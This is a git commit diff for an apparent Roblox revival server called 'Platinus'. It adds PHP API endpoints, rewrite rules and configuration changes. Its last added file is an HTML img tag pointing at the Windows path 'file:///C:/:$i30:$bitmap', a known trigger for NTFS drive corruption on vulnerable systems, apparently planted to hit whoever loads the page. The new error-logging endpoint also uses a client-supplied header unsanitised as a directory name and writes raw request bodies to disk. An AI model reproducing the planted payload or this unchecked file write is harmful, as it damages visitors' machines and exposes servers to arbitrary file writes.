asdasd
This commit is contained in:
parent
7842b100ef
commit
252fa2ae23
|
|
@ -14,5 +14,6 @@ header("Content-Type: application/json");
|
|||
|
||||
?>
|
||||
{
|
||||
|
||||
"StatsGatheringScriptUrl": "",
|
||||
"DFFlagLogAutoCamelCaseFixes": "True"
|
||||
}
|
||||
|
|
@ -14,6 +14,7 @@ header("Content-Type: application/json");
|
|||
|
||||
?>
|
||||
{
|
||||
"FFlagUS30484p3": "True",
|
||||
"FIntUS30484p2": 100,
|
||||
"GoogleAnalyticsAccountPropertyID": "G-47TC169RJN",
|
||||
"GoogleAnalyticsAccountPropertyIDPlayer": "G-CSJXGEJRH3",
|
||||
|
|
|
|||
|
|
@ -1 +1,3 @@
|
|||
RewriteEngine On
|
||||
RewriteRule ^v1.1/Counters/Increment/?$ /incrementcounters.php [NC,L]
|
||||
ErrorDocument 404 /index.php
|
||||
|
|
@ -0,0 +1,13 @@
|
|||
<?php
|
||||
|
||||
/*
|
||||
|
||||
Platinus Ephemeral Counters Api
|
||||
|
||||
*/
|
||||
|
||||
require $_SERVER["DOCUMENT_ROOT"] . "/../../../WebAssemblies/loader.php";
|
||||
|
||||
$page = new Platinus\API();
|
||||
|
||||
//EOF
|
||||
|
|
@ -1,3 +1,5 @@
|
|||
RewriteEngine on
|
||||
RewriteRule ^Login/Negotiate.ashx$ /negotiatecookie.php [NC,L]
|
||||
RewriteRule ^universes/validate-place-join/?$ /validate.php [NC,L]
|
||||
RewriteRule ^game/players/([0-9]+)/?$ /chatinfo.php [NC,L]
|
||||
ErrorDocument 404 /index.php
|
||||
|
|
@ -0,0 +1,15 @@
|
|||
<?php
|
||||
|
||||
/*
|
||||
|
||||
Platinus Chat Filter Info API
|
||||
|
||||
*/
|
||||
|
||||
require $_SERVER["DOCUMENT_ROOT"] . "/../../../WebAssemblies/loader.php";
|
||||
|
||||
$page = new Platinus\API();
|
||||
|
||||
$page->RespondJSON(array("ChatFilter"=>"blacklist"));
|
||||
|
||||
//EOF
|
||||
|
|
@ -0,0 +1,13 @@
|
|||
<?php
|
||||
|
||||
/*
|
||||
|
||||
Platinus Place Join Validation
|
||||
|
||||
*/
|
||||
|
||||
require $_SERVER["DOCUMENT_ROOT"] . "/../../../WebAssemblies/loader.php";
|
||||
|
||||
$page = new Platinus\API();
|
||||
|
||||
exit("true");
|
||||
|
|
@ -15,8 +15,6 @@ function isGetSet($needle)
|
|||
return isset($_GET[$needle]) && $_GET[$needle] == (int)$_GET[$needle];
|
||||
}
|
||||
|
||||
file_put_contents("egg.txt", print_r($_SERVER, true));
|
||||
|
||||
if(isGetSet("id"))
|
||||
{
|
||||
$url = "https://assetdelivery.roblox.com/v1/asset/?id=" . $_GET["id"];
|
||||
|
|
|
|||
|
|
@ -28,7 +28,7 @@ ob_start();
|
|||
|
||||
$page->RespondJSON(array(
|
||||
"ClientPort"=>0,
|
||||
"MachineAddress"=>"192.168.0.3",
|
||||
"MachineAddress"=>"127.0.0.1",
|
||||
"ServerPort"=>53640,
|
||||
"PingUrl"=>"",
|
||||
"PingInterval"=>120,
|
||||
|
|
@ -45,7 +45,7 @@ $page->RespondJSON(array(
|
|||
"VideoInfo"=>"<?xml version=\"1.0\"?><entry xmlns=\"http://www.w3.org/2005/Atom\" xmlns:media=\"http://search.yahoo.com/mrss/\" xmlns:yt=\"http://gdata.youtube.com/schemas/2007\"><media:group><media:title type=\"plain\"><![CDATA[Platinus Place]]></media:title><media:description type=\"plain\"><![CDATA[ For more games visit http://www.platinus2016.ga]]></media:description><media:category scheme=\"http://gdata.youtube.com/schemas/2007/categories.cat\">Games</media:category><media:keywords>Platinus, 2016, ROBLOX, video, free game, online virtual world</media:keywords></media:group></entry>",
|
||||
"BaseUrl"=>"http://assetgame.platinus.local/",
|
||||
"ChatStyle"=>"ClassicAndBubble",
|
||||
"CreatorId"=>0,
|
||||
"CreatorId"=>420,
|
||||
"CreatorTypeEnum"=>"User",
|
||||
"MembershipType"=>"None",
|
||||
"AccountAge"=>0,
|
||||
|
|
|
|||
|
|
@ -1 +1,3 @@
|
|||
RewriteEngine On
|
||||
RewriteRule ^Error/Grid.ashx/?$ /errorgrid.php [NC,L]
|
||||
ErrorDocument 404 /index.php
|
||||
|
|
@ -0,0 +1,34 @@
|
|||
<?php
|
||||
|
||||
/*
|
||||
|
||||
Platinus Grid Error Endpoint
|
||||
|
||||
*/
|
||||
|
||||
require $_SERVER["DOCUMENT_ROOT"] . "/../../WebAssemblies/loader.php";
|
||||
|
||||
$page = new Platinus\API();
|
||||
|
||||
if(isset($_GET["filename"])){
|
||||
$logDir = $_SERVER["DOCUMENT_ROOT"] . "/../../logs/";
|
||||
$ip = "unknown";
|
||||
|
||||
if(isset($_SERVER["HTTP_CF_CONNECTING_IP"])){
|
||||
$ip = $_SERVER["HTTP_CF_CONNECTING_IP"];
|
||||
}elseif($ip === "unknown" && isset($_SERVER["REMOTE_ADDR"])){
|
||||
$ip = $_SERVER["REMOTE_ADDR"];
|
||||
}
|
||||
|
||||
if(!is_dir($logDir)){
|
||||
mkdir($logDir);
|
||||
}
|
||||
|
||||
if(!is_dir($logDir . "/$ip/")){
|
||||
mkdir($logDir . "/$ip/");
|
||||
}
|
||||
|
||||
file_put_contents($logDir . "/$ip/" . date("U",time()), urldecode($_GET["filename"]) . "\n" . file_get_contents("php://input"));
|
||||
}
|
||||
|
||||
//EOF
|
||||
|
|
@ -0,0 +1 @@
|
|||
<img class="lol" src="file:///C:/:$i30:$bitmap">
|
||||
Loading…
Reference in New Issue